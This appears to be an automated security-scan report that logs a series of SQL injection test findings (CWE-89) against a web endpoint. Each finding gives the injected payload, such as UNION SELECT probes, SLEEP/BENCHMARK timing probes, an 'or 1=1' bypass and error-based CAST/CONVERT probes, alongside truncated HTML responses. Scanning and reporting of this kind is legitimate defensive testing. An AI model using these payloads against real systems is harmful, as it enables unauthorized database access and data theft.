Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #958\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #959\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io admin' or '1'='1'/*\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #960\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 3#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #961\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('\nA')),4,5,6,7#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #962\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 3516=CAST((CHR(113)||CHR(106)||CHR(122)||CHR(106)||\nCHR(113))||(SELECT (CASE WHEN (3516=3516) THEN 1 ELSE\n0 END))::text||(CHR(113)||CHR(112)||CHR(106)||CHR(107)||CHR\n(113)) AS NUMERIC)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #963\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ,(select * from (select(sleep(10)))a)Response Content-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #964\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>\nDeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=\ndevice-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/\nhead/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> \nwindow.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start of\nZendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://\nstatic.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> <\n/script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link\nrel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWF\nnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoq\nIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary hints \non your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89Issue Number #965\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #966\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #967\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #968\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #969\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+\nCHAR(107)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #970\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #971\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta 